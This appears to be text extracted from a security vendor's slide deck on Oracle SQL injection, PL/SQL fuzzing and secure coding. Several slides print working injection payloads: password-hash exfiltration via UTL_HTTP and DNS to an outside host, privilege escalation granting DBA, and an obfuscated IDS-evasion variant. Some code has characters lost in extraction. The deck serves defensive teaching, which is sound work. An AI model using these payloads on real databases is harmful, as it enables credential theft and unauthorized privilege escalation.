Hack Your DB Before The Hackers Do Todd DeSantis Sales Engineer

1
Hack Your DB Before The Hackers Do! Todd
DeSantisSales Engineer
2
Whats This Presentation All About?

• Explore common DB vul.
• SQL injection
• Create your custom fuzzer
• What is a fuzzer anyway?
• PL/SQL the right tool for the right job
• Bombs away

3
SQL Injection

• Wikipedia
• is a technique that exploits a security
  vulnerability occurring in the database layer of
  an application. The vulnerability is present when
  user input is either incorrectly filtered for
  string literal escape characters embedded in SQL
  statements or user input is not strongly typed
  and thereby unexpectedly executed.

4
SQL Injection

• Exists in any layer of any application
• C/S and Web Applications
• Stored program units
• Build in
• User created
• Has many forms
• Extra queries, unions, order by, sub selects
• Easily avoided
• Bind variables, strong typing

5
SQL Injection Types

• In band Use injection to return extra data
• Part of normal result set (unions)
• In error messages
• Out of band Use alternative route like
  UTL_HTTP, DNS to extract data
• Blind / Inference No data is returned but the
  hacker is able to infer the data using return
  codes, error codes, timing measurments and more

6
SQL Injection In-band

• SQLgt select utl_inaddr.get_host_name('127.0.0.1')
  from dual
• localhost
• SQLgt select utl_inaddr.get_host_name((select
• username''password
• from dba_users where rownum1)) from dual
• select utl_inaddr.get_host_name((select
• username''password from dba_users where
  rownum1))
• from dual
• ERROR at line 1
• ORA-29257 host SYS8A8F025737A9097A unknown
• ORA-06512 at "SYS.UTL_INADDR", line 4
• ORA-06512 at "SYS.UTL_INADDR", line 35
• ORA-06512 at line 1

7
SQL Injection Out-of-band

• Send information via HTTP to an external site via
  HTTPURI
• select HTTPURITYPE( 'http//www.sentrigo.com/'
• (select password from dba_users where rownum1)
  ).getclob() from
• dual
• Send information via HTTP to an external site via
  utl_http
• select utl_http.request ('http//www.sentrigo.com/
  '
• (select password from dba_users where rownum1))
  from dual
• Send information via DNS (max. 64 bytes) to an
  external site
• select utl_http.request ('http//www.'(select
  password
• from dba_users where rownum1)'.sentrigo.com/'
  )
• from dual
• DNS-Request www.8A8F025737A9097A.sentrigo.com

8
Blind SQL Injection

• Pseudo-Code
• If the first character of the sys-hashkey is a
  'A'
• then
• select count() from all_objects,all_objects
• else
• select count() from dual
• end if

9
SQL Injection Web Application

• Username ' or 11 --
• The original statement looked like
• 'select from users where username '''
  username ''' and password ''' password
  ''''
• The result
• select from users where username '' or 11
  --' and password ''
• This is not what we'll talk about

10
SQL Injection PL/SQL

• Two execution modes
• Definer rights
• Invoker rights
• Source code not always available
• There are several un-wrappers available
• One can find injections without the source
• Find dependencies
• Trial and error
• vsql
• Fuzzer

11
SQL Injection Demo Procedure

• CREATE OR REPLACE PROCEDURE LIST_TABLES(p_owner
  VARCHAR2)
• IS
• TYPE c_type IS REF CURSOR l_cv c_type
  l_buff VARCHAR2(100)
• BEGIN
• dbms_output.enable(100000)
• OPEN l_cv FOR 'SELECT object_name FROM
  all_objects WHERE owner ''' p_owner '''
  AND object_type ''TABLE'''
• LOOP
• FETCH l_cv INTO l_buff
• dbms_output.put_line(l_buff)
• EXIT WHEN l_cvNOTFOUND
• END LOOP
• CLOSE l_cv
• END
• /

12
SQL Injection Inject SQL

• SQLgt set serveroutput on
• SQLgt exec list_tables('SCOTT')
• DEPT
• EMP
• BONUS
• SALGRADE
• SALGRADE
• SQLgt exec list_tables('KUKU'' UNION SELECT
  username '''' password FROM dba_users--')
• BIFA1D2B85B70213F3
• CTXSYS71E687F036AD56E5
• DBSNMP0B813E8C027CA786

13
SQL Injection Inject Functions

• CREATE OR REPLACE FUNCTION get_dba
• RETURN VARCHAR2
• AUTHID CURRENT_USER
• IS
• PRAGMA AUTONOMOUS_TRANSACTION
• BEGIN
• EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'
• RETURN 'Hacked'
• END get_dba
• /

14
SQL Injection Inject Functions

• SQLgt exec sys.list_tables('NOUSER''
  scott.get_dba()--')
• PL/SQL procedure successfully completed.
• SQLgt _at_privs
• Roles for current user
• USERNAME GRANTED_ROLE
• ------------------------------ ------------
• SCOTT CONNECT
• SCOTT DBA
• SCOTT RESOURCE

15
SQL Injection Cursor Injection

• DECLARE
• l_cr NUMBER
• l_res NUMBER
• BEGIN
• l_cr dbms_sql.open_cursor
• dbms_sql.parse(l_cr,
• 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION
  BEGIN EXECUTE IMMEDIATE ''GRANT dba to public''
  END', dbms_sql.native)
• sys.list_tables(''' dbms_sql.execute('
  l_cr ') --')
• END
• /

16
SQL Injection IDS Evasion

• DECLARE
• l_cr NUMBER
• l_res NUMBER
• BEGIN
• l_cr dbms_sql.open_cursor
• dbms_sql.parse(l_cr,
• translate('1vm3 43.l3
  3795z5l572_93z23v965ze x.6z bv79 6ll1639
  .3z9 1x3 95
• 47xm6ve z1e',
• '9876543210.,)(mnbvcxzlkjhgfdsapoiuytrewq',
  'qwertyuiopasdfghjklzxcvbnm(),.0123456789'''),
  dbms_sql.native)
• sys.list_tables(''' dbms_sql.execute('
  l_cr ') --')
• END
• /

17
SQL Injection - Wrapping

• CREATE OR REPLACE PACKAGE own_db wrapped
• a000000 1 abcd abcd abcd abcd abcd abcd abcd abcd
  abcd abcd abcd abcd abcd abcd abcd 9 62 92
• 9lIown0XyYaBSui895eb0pSC9swg2JHf8upfOemZ7GbnvmzvT
  4nCxqyAlcztZ1ptv7ZMga3
• n6fHlbVac7MmcB19JJfqDkhynlrig0pwVDbao4q4lxWhPw8VP
  J1yr6dDzmzm9BCQqbTDIhq
• /
• CREATE OR REPLACE PACKAGE BODY own_db wrapped
• a000000 1 abcd abcd abcd abcd abcd abcd abcd abcd
  abcd abcd abcd abcd abcd abcd abcd b 118 13c
• ERNYhQ8lgvIjF5xjsIv4Vn7Mr5AwgnINfZqfHQCvw2qAkhIOL
  LtwRq0J3wTzXDZ2ACNSNZV
• q7ThHqgkvPIFf5BBRkG8BzmglrS29fqkyu2VjB4hbzufKqMzPt
  GCO2VS1/PgsqQBO0upKyeF
• tFs22G7gnian7xdfRCC8K997/O11lM36KxulqMhOFpfPEE//ts
  8T3Cr7sELbhsDV4kuqDBI
• 6VX3Cs2jqxhIqgnhfrxClimWGyS8UMsw8tjQkPJwYzZGW8Gjd
  5fWMH9Doiqck5GjwT8ELf
• H06/kj/lPShfNA4QReEIGDd
• /

18
SQL Injection Object Injection

• Developers and DBAs never sanitize scripts
• CREATE OR REPLACE FUNCTION F1 return number
• authid current_user as
• pragma autonomous_transaction
• BEGIN
• EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'
• RETURN 1
• END
• /
• create table or 1userxxx.f1 (a
  varchar2(1))

19
SQL Injection Lateral Injection

• Code does not have to receive parameters to be
  injected (Litchfield wrote about this)
• EXECUTE IMMEDIATE 'update x set y '''
  SYSDATE ''''
• Running this code before
• alter session set nls_date_format ''' and 1
  hacker.attack() --'

20
Finding Vulnerable Code

• Finding dynamic query code
• select from dba_dependencies where
  referenced_name 'DBMS_SQL'
• select from dba_source where upper(text) like
  'IMMEDIATE'
• Finding sysdate
• select from dba_source where upper(text) like
  'SYSDATE'

21
Fuzzing

• Fuzz testing or fuzzing is a software testing
  technique that provides random data ("fuzz") to
  the inputs of a program. If the program fails
  (for example, by crashing, or by failing built-in
  code assertions), the defects can be noted.The
  great advantage of fuzz testing is that the test
  design is extremely simple, and free of
  preconceptions about system behavior.

22
PL/SQL The Right Tool

• Easy to run SQL
• Built-in the database
• Cross platform
• Good enough for the task
• DBAs already speak it fluently
• Can be easily scheduled as a DB job

23
Caution Use With Care

• Fuzzing on production is a big no-no
• Be sure to receive permission from the DB owner

24
Design

• Track using tables
• Track fuzzing results
• Rerun, Restart tests after stoping and failing
• Discovery
• Code to find interesting stored program units
• Invoke
• Invocation code to invoke stored procedures with
  different edge-case parameters
• Wrap
• Tie it up in a loop and wrap in a package
• Report
• Report findings

25
Track A Simple ERD Example
FUZZ_SEARCH ID TEXT
FUZZ_CODES SQL_CODE DESCIPTION
FUZZ_RUN ID NAME START_TS END_TS
FUZZ_INPUT ID DATATYPE VALUE
FUZZED_OBJ ID FUZZ_RUN_ID OBJ_ID METHOD_NAME PARAM
S START_TS END_TS IS_VUL
FUZZED_EXEC_REC ID FUZZED_EXEC_ID ORD VAL
FUZZED_EXEC ID FUZZED_OBJ_ID RESULT
26
Discovery Find Relevant Objects
27
Discovery Find Interesting Ones
28
Discovery Find Interesting Ones
29
Discovery Placing Data In Tables

• Use all_arguments to get parameters
• Optional - use dbms_describe
• Find 'Language Java' in code and then use check
  the PL/SQL wrapper
• Save the data for future re-runs

30
Invoke Fuzzed Code

• Use "execute immediate" to invoke anonymous
  PL/SQL blocks created from describe code
• Pass in various interesting input parameters
• Strings containing ' or "
• Long strings
• Nulls
• Combinations
• Off-by-one
• On code using concatenation of numbers and dates
  directly without formating
• NLS_DATE_FORMAT
• NLS_NUMERIC_CHARACTERS

31
Invoking Fuzzed Code

• Catch interesting errors
• ORA-00921 unexpected end of SQL command
• ORA-00936 missing expression
• ORA-00933 SQL command not properly ended
• ORA-00970, ORA-00907, ORA-01756, ORA-00923,
  ORA-00900, PLS-00103, LPX-00601, ORA-00604
• Crashes for C code
• ORA-03113 might also be an instance crash
• ORA-03114, ORA-01012
• ORA-00600 Internal error
• etc.

32
Example Interface
33
Example Interface
34
Example Interface
35
Bombs Away

• Running as DBA on Oracle supplied code can be
  very interesting
• Sentrigo Red Team discovered multiple
  vulnerabilities this way
• Reported to Oracle
• Protected by Hedgehog out of the box

36
Other Fuzzers Out There

• Inguma PL/SQL fuzzer
• Written by Joxean Koret
• Python
• http//inguma.sourceforge.net/
• SPIKE
• Not Oracle specific
• Used to analyze and fuzz network protocols
• http//www.immunityinc.com/resources-freesoftware.
  shtml

37
Write Secure Code

• The least privilege principle
• Lock down packages
• System access, file access, network access
• Use secure coding techniques
• Bind variables
• input validation
• Clear ownership of security issues
• dbms_assert
• Provided by Oracle and backported to older
  databases

38
Bind Variables Java

• Statement stmt conn.createStatement()
• ResultSet rs stmt.executeQuery(
• "select from users where username '"
  username "'"
• vs.
• PreparedStatement pstmt conn.prepareStatement("s
  elect from users where username ?")
• pstmt.setString(1, username)
• ResultSet rs pstmt.executeQuery()

39
Bind Variables PL/SQL Bad

• CREATE OR REPLACE FUNCTION get_id_or_boss(p_ename
  VARCHAR2, p_boss NUMBER)
• RETURN VARCHAR2 IS
• v_empno emp.empnoTYPE
• BEGIN
• IF p_boss 0 THEN
• EXECUTE IMMEDIATE 'SELECT empno
  FROM emp WHERE ename ''' p_ename ''''
  INTO v_empno
• ELSE
• EXECUTE IMMEDIATE 'SELECT mgr
  FROM emp WHERE ename ''' p_ename ''''
  INTO v_empno
• END IF
• RETURN v_empno
• END get_id_or_boss_id

40
Bind Variables PL/SQL - Good

• CREATE OR REPLACE FUNCTION get_id_or_boss(p_ename
  VARCHAR2, p_boss NUMBER)
• RETURN VARCHAR2 IS
• v_sql VARCHAR2(2000)
• v_empno emp.empnoTYPE
• BEGIN
• IF p_boss 0 THEN
• v_sql 'SELECT empno FROM emp
  WHERE ename 1'
• ELSE
• v_sql 'SELECT mgr FROM emp
  WHERE ename 1'
• END IF
• EXECUTE IMMEDIATE v_sql INTO v_empno
  USING p_ename
• RETURN v_empno
• END get_id_or_boss_id

41
Input Validation DBMS_ASSERT

• Functions
• NOOP
• SIMPLE_SQL_NAME
• QUALIFIED_SQL_NAME
• SCHEMA_NAME
• SQL_OBJECT_NAME
• ENQUOTE_NAME
• ENQUOTE_LITERAL

42
Secure Coding Policies

• Setup secure coding policies for the different
  languages
• Make the coding policies part of every contract
  external and internal
• Default document for all developers
• OWASP

43
Some Coding Rules

• Avoid hardcoding username/password
• Wrap sensitive/important program code even if
  not really safe
• Use full qualified names for function and
  procedure calls (e.g. SYS.DBMS_ASSERT)
• Always validate user/database input
• Be careful with dynamic statements (Cursors,
  SQL-Statements, )
• Be careful with file access
• Be careful with OS command execution

44
Protecting Your Database

• Try out the Hedgehog -http//www.sentrigo.com
• Virtual patching
• SQL Injection protection
• Fine grain auditing
• Centralized management
• More

45
Questions?